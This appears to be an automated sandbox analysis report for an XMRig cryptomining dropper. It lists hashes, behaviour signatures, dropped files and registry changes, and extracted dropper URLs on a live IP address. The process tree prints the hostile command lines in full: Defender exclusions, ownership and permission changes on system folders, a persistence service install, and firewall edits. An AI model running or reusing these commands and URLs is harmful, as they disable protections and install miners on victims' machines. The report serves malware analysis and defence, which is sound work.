xmrig | 39b66a47affa0edde59d74760fc17de28c0d3cbabe7469d382a721ea91b5c123

Analysis

max time kernel
151s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
13-05-2022 05:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c671c024595fbae1bcb523930b41952a.exe
Size

6.7MB
MD5

c671c024595fbae1bcb523930b41952a
SHA1

af16bda06ebf490087aac1e444e25017e180c7d4
SHA256

39b66a47affa0edde59d74760fc17de28c0d3cbabe7469d382a721ea91b5c123
SHA512

fb1d9e0488eb247c54b86a0fbb7f1929d6ead0de3502d44e5db701aff3b3df0d7b312939e02bb89790006ea4337dc63b973ce5a2971e132a4188d003ddc95a3b

Score

10^/10

xmrig discovery evasion exploit miner persistence suricata

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://45.81.224.130/any.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://45.81.224.130/curl.exe

Signatures

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Windows\Tasks\ApplicationsFrameHost.exe	xmrig
C:\Windows\Tasks\ApplicationsFrameHost.exe	xmrig

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

94 924 powershell.exe
157 3652 powershell.exe
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

flow	pid	process
94	924	powershell.exe
157	3652	powershell.exe

Executes dropped EXE 13 IoCs

Processes:

migrate.exeWmiic.exeWmiic.exeWmiic.exeIntelConfigService.exeWrap.exeApplicationsFrameHost.exeSuperfetch.exeMSTask.exe~Ma4650.exeany.exewininit.execurl.exe

pid	process
3312	migrate.exe
2180	Wmiic.exe
4236	Wmiic.exe
3464	Wmiic.exe
3568	IntelConfigService.exe
1416	Wrap.exe
3648	ApplicationsFrameHost.exe
1100	Superfetch.exe
4480	MSTask.exe
5092	~Ma4650.exe
2240	any.exe
460	wininit.exe
2940	curl.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Possible privilege escalation attempt 18 IoCs

exploit

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4516	icacls.exe
2008	icacls.exe
384	takeown.exe
3796	icacls.exe
4480	icacls.exe
4196	icacls.exe
4972	icacls.exe
908	icacls.exe
4892	icacls.exe
4712	icacls.exe
3616	icacls.exe
3880	icacls.exe
2068	icacls.exe
3360	icacls.exe
2476	icacls.exe
5048	icacls.exe
1480	icacls.exe
1944	icacls.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

c671c024595fbae1bcb523930b41952a.exemigrate.exeany.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	c671c024595fbae1bcb523930b41952a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	migrate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	any.exe

Loads dropped DLL 3 IoCs

Processes:

~Ma4650.exe

pid process

5092 ~Ma4650.exe
5092 ~Ma4650.exe
5092 ~Ma4650.exe

pid	process
5092	~Ma4650.exe
5092	~Ma4650.exe
5092	~Ma4650.exe

Modifies file permissions 1 TTPs 18 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4712	icacls.exe
4196	icacls.exe
4480	icacls.exe
2476	icacls.exe
5048	icacls.exe
3796	icacls.exe
3880	icacls.exe
908	icacls.exe
384	takeown.exe
1944	icacls.exe
4516	icacls.exe
2068	icacls.exe
1480	icacls.exe
4892	icacls.exe
3616	icacls.exe
4972	icacls.exe
2008	icacls.exe
3360	icacls.exe

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Windows\Tasks\IntelConfigService.exe	autoit_exe
C:\windows\tasks\IntelConfigService.exe	autoit_exe
C:\Windows\Tasks\Superfetch.exe	autoit_exe
C:\Windows\Tasks\Superfetch.exe	autoit_exe

Drops file in Windows directory 31 IoCs

Processes:

migrate.exeany.exepowershell.exeIntelConfigService.exeApplicationsFrameHost.exepowershell.execmd.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\MSTask.exe	migrate.exe
File created	C:\Windows\Tasks\run.bat	migrate.exe
File created	C:\Windows\Tasks\Wmiic.exe	migrate.exe
File created	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe
File created	C:\Windows\Migration\system.conf	any.exe
File created	\??\c:\windows\migration\any.exe	powershell.exe
File opened for modification	C:\Windows\Tasks\config.json	migrate.exe
File opened for modification	C:\Windows\Tasks\run.bat	migrate.exe
File opened for modification	C:\Windows\Migration\system.conf	any.exe
File created	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File created	C:\Windows\Tasks\Wrap.exe	migrate.exe
File opened for modification	C:\Windows\Tasks	IntelConfigService.exe
File created	C:\Windows\Tasks\config.json	migrate.exe
File opened for modification	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File created	C:\Windows\Tasks\__tmp_rar_sfx_access_check_240568375	migrate.exe
File created	C:\Windows\Tasks\MSTask.exe	migrate.exe
File created	C:\Windows\Migration\__tmp_rar_sfx_access_check_240580328	any.exe
File opened for modification	C:\Windows\Migration\wininit.exe	any.exe
File created	C:\Windows\Migration\any.bat	any.exe
File opened for modification	C:\Windows\Migration\any.bat	any.exe
File opened for modification	C:\Windows\Tasks\Wrap.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\config.json	ApplicationsFrameHost.exe
File created	C:\Windows\Migration\wininit.exe	any.exe
File created	\??\c:\windows\curl.exe	powershell.exe
File created	C:\Windows\Migration\.tmp	cmd.exe
File created	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File created	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File opened for modification	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File opened for modification	C:\Windows\Tasks\Wmiic.exe	migrate.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 9 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

4952 timeout.exe
808 timeout.exe
4716 timeout.exe
3828 timeout.exe
3100 timeout.exe
4696 timeout.exe
1672 timeout.exe
1616 timeout.exe
4444 timeout.exe
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

3944 tasklist.exe
3100 tasklist.exe
204 tasklist.exe

pid	process
4952	timeout.exe
808	timeout.exe
4716	timeout.exe
3828	timeout.exe
3100	timeout.exe
4696	timeout.exe
1672	timeout.exe
1616	timeout.exe
4444	timeout.exe

pid	process
3944	tasklist.exe
3100	tasklist.exe
204	tasklist.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

~Ma4650.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001"	~Ma4650.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe

Modifies data under HKEY_USERS 22 IoCs

Processes:

MSTask.exe~Ma4650.exewininit.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	MSTask.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl	~Ma4650.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001"	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main\FeatureControl	~Ma4650.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	MSTask.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MSTask.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001"	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	wininit.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	MSTask.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\MAIN	~Ma4650.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MSTask.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeIntelConfigService.exepowershell.exe

pid	process
4048	powershell.exe
4048	powershell.exe
1092	powershell.exe
1092	powershell.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
924	powershell.exe
924	powershell.exe
924	powershell.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

~Ma4650.exe

pid process

5092 ~Ma4650.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

656

pid	process
5092	~Ma4650.exe

pid	process
656

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exetasklist.exeApplicationsFrameHost.exepowershell.exetasklist.exepowershell.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	3944	tasklist.exe
Token: SeLockMemoryPrivilege	3648	ApplicationsFrameHost.exe
Token: SeDebugPrivilege	924	powershell.exe
Token: SeDebugPrivilege	3100	tasklist.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeIncreaseQuotaPrivilege	3516	WMIC.exe
Token: SeSecurityPrivilege	3516	WMIC.exe
Token: SeTakeOwnershipPrivilege	3516	WMIC.exe
Token: SeLoadDriverPrivilege	3516	WMIC.exe
Token: SeSystemProfilePrivilege	3516	WMIC.exe
Token: SeSystemtimePrivilege	3516	WMIC.exe
Token: SeProfSingleProcessPrivilege	3516	WMIC.exe
Token: SeIncBasePriorityPrivilege	3516	WMIC.exe
Token: SeCreatePagefilePrivilege	3516	WMIC.exe
Token: SeBackupPrivilege	3516	WMIC.exe
Token: SeRestorePrivilege	3516	WMIC.exe
Token: SeShutdownPrivilege	3516	WMIC.exe
Token: SeDebugPrivilege	3516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3516	WMIC.exe
Token: SeRemoteShutdownPrivilege	3516	WMIC.exe
Token: SeUndockPrivilege	3516	WMIC.exe
Token: SeManageVolumePrivilege	3516	WMIC.exe
Token: 33	3516	WMIC.exe
Token: 34	3516	WMIC.exe
Token: 35	3516	WMIC.exe
Token: 36	3516	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3516	WMIC.exe
Token: SeSecurityPrivilege	3516	WMIC.exe
Token: SeTakeOwnershipPrivilege	3516	WMIC.exe
Token: SeLoadDriverPrivilege	3516	WMIC.exe
Token: SeSystemProfilePrivilege	3516	WMIC.exe
Token: SeSystemtimePrivilege	3516	WMIC.exe
Token: SeProfSingleProcessPrivilege	3516	WMIC.exe
Token: SeIncBasePriorityPrivilege	3516	WMIC.exe
Token: SeCreatePagefilePrivilege	3516	WMIC.exe
Token: SeBackupPrivilege	3516	WMIC.exe
Token: SeRestorePrivilege	3516	WMIC.exe
Token: SeShutdownPrivilege	3516	WMIC.exe
Token: SeDebugPrivilege	3516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3516	WMIC.exe
Token: SeRemoteShutdownPrivilege	3516	WMIC.exe
Token: SeUndockPrivilege	3516	WMIC.exe
Token: SeManageVolumePrivilege	3516	WMIC.exe
Token: 33	3516	WMIC.exe
Token: 34	3516	WMIC.exe
Token: 35	3516	WMIC.exe
Token: 36	3516	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2332	WMIC.exe
Token: SeSecurityPrivilege	2332	WMIC.exe
Token: SeTakeOwnershipPrivilege	2332	WMIC.exe
Token: SeLoadDriverPrivilege	2332	WMIC.exe
Token: SeSystemProfilePrivilege	2332	WMIC.exe
Token: SeSystemtimePrivilege	2332	WMIC.exe
Token: SeProfSingleProcessPrivilege	2332	WMIC.exe
Token: SeIncBasePriorityPrivilege	2332	WMIC.exe
Token: SeCreatePagefilePrivilege	2332	WMIC.exe
Token: SeBackupPrivilege	2332	WMIC.exe
Token: SeRestorePrivilege	2332	WMIC.exe
Token: SeShutdownPrivilege	2332	WMIC.exe
Token: SeDebugPrivilege	2332	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2332	WMIC.exe
Token: SeRemoteShutdownPrivilege	2332	WMIC.exe

Suspicious use of FindShellTrayWindow 9 IoCs

Processes:

IntelConfigService.exeApplicationsFrameHost.exeSuperfetch.exe

pid	process
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3568	IntelConfigService.exe
3648	ApplicationsFrameHost.exe
1100	Superfetch.exe
1100	Superfetch.exe
1100	Superfetch.exe
1100	Superfetch.exe
1100	Superfetch.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

~Ma4650.exe

pid process

5092 ~Ma4650.exe
5092 ~Ma4650.exe
5092 ~Ma4650.exe

pid	process
5092	~Ma4650.exe
5092	~Ma4650.exe
5092	~Ma4650.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c671c024595fbae1bcb523930b41952a.execmd.execmd.exemigrate.exe

description	pid	process	target process
PID 448 wrote to memory of 4048	448	c671c024595fbae1bcb523930b41952a.exe	powershell.exe
PID 448 wrote to memory of 4048	448	c671c024595fbae1bcb523930b41952a.exe	powershell.exe
PID 448 wrote to memory of 4048	448	c671c024595fbae1bcb523930b41952a.exe	powershell.exe
PID 448 wrote to memory of 4696	448	c671c024595fbae1bcb523930b41952a.exe	cmd.exe
PID 448 wrote to memory of 4696	448	c671c024595fbae1bcb523930b41952a.exe	cmd.exe
PID 448 wrote to memory of 4696	448	c671c024595fbae1bcb523930b41952a.exe	cmd.exe
PID 4696 wrote to memory of 4992	4696	cmd.exe	cmd.exe
PID 4696 wrote to memory of 4992	4696	cmd.exe	cmd.exe
PID 4696 wrote to memory of 4992	4696	cmd.exe	cmd.exe
PID 4992 wrote to memory of 2296	4992	cmd.exe	chcp.com
PID 4992 wrote to memory of 2296	4992	cmd.exe	chcp.com
PID 4992 wrote to memory of 2296	4992	cmd.exe	chcp.com
PID 4992 wrote to memory of 1092	4992	cmd.exe	powershell.exe
PID 4992 wrote to memory of 1092	4992	cmd.exe	powershell.exe
PID 4992 wrote to memory of 1092	4992	cmd.exe	powershell.exe
PID 4992 wrote to memory of 3944	4992	cmd.exe	tasklist.exe
PID 4992 wrote to memory of 3944	4992	cmd.exe	tasklist.exe
PID 4992 wrote to memory of 3944	4992	cmd.exe	tasklist.exe
PID 4992 wrote to memory of 4236	4992	cmd.exe	find.exe
PID 4992 wrote to memory of 4236	4992	cmd.exe	find.exe
PID 4992 wrote to memory of 4236	4992	cmd.exe	find.exe
PID 4992 wrote to memory of 384	4992	cmd.exe	takeown.exe
PID 4992 wrote to memory of 384	4992	cmd.exe	takeown.exe
PID 4992 wrote to memory of 384	4992	cmd.exe	takeown.exe
PID 4992 wrote to memory of 4952	4992	cmd.exe	timeout.exe
PID 4992 wrote to memory of 4952	4992	cmd.exe	timeout.exe
PID 4992 wrote to memory of 4952	4992	cmd.exe	timeout.exe
PID 4992 wrote to memory of 2068	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 2068	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 2068	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 5048	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 5048	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 5048	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 3796	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 3796	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 3796	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 3360	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 3360	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 3360	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 2476	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 2476	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 2476	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 1480	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 1480	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 1480	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 4892	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 4892	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 4892	4992	cmd.exe	icacls.exe
PID 4992 wrote to memory of 808	4992	cmd.exe	timeout.exe
PID 4992 wrote to memory of 808	4992	cmd.exe	timeout.exe
PID 4992 wrote to memory of 808	4992	cmd.exe	timeout.exe
PID 4992 wrote to memory of 3312	4992	cmd.exe	migrate.exe
PID 4992 wrote to memory of 3312	4992	cmd.exe	migrate.exe
PID 4992 wrote to memory of 3312	4992	cmd.exe	migrate.exe
PID 3312 wrote to memory of 4712	3312	migrate.exe	icacls.exe
PID 3312 wrote to memory of 4712	3312	migrate.exe	icacls.exe
PID 3312 wrote to memory of 4712	3312	migrate.exe	icacls.exe
PID 3312 wrote to memory of 4196	3312	migrate.exe	icacls.exe
PID 3312 wrote to memory of 4196	3312	migrate.exe	icacls.exe
PID 3312 wrote to memory of 4196	3312	migrate.exe	icacls.exe
PID 3312 wrote to memory of 3616	3312	migrate.exe	icacls.exe
PID 3312 wrote to memory of 3616	3312	migrate.exe	icacls.exe
PID 3312 wrote to memory of 3616	3312	migrate.exe	icacls.exe
PID 3312 wrote to memory of 4480	3312	migrate.exe	icacls.exe

C:\Users\Admin\AppData\Local\Temp\c671c024595fbae1bcb523930b41952a.exe
"C:\Users\Admin\AppData\Local\Temp\c671c024595fbae1bcb523930b41952a.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:4992

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:2296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3944

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:4236

C:\Windows\SysWOW64\takeown.exe
takeown /f c:\windows\tasks
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:384

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:4952

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2068

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5048

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3796

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3360

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2476

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1480

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4892

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:808

\??\c:\programdata\migrate.exe
c:\programdata\migrate.exe -p4432
4⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3312

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4712

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4196

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3616

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Users:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4480

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1944

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "%domain%Admin:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3880

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "
5⤵
PID:2156

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:1616

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
6⤵
- Executes dropped EXE
PID:2180

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:4444

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic" start WMService
6⤵
- Executes dropped EXE
PID:4236

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 2 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:3828

C:\Windows\SysWOW64\net.exe
net start WMService
6⤵
PID:5116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start WMService
7⤵
PID:5084

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="block vilnerabliti" dir=in protocol=TCP localport=88 action=block
6⤵
PID:1940

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
6⤵
PID:2376

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
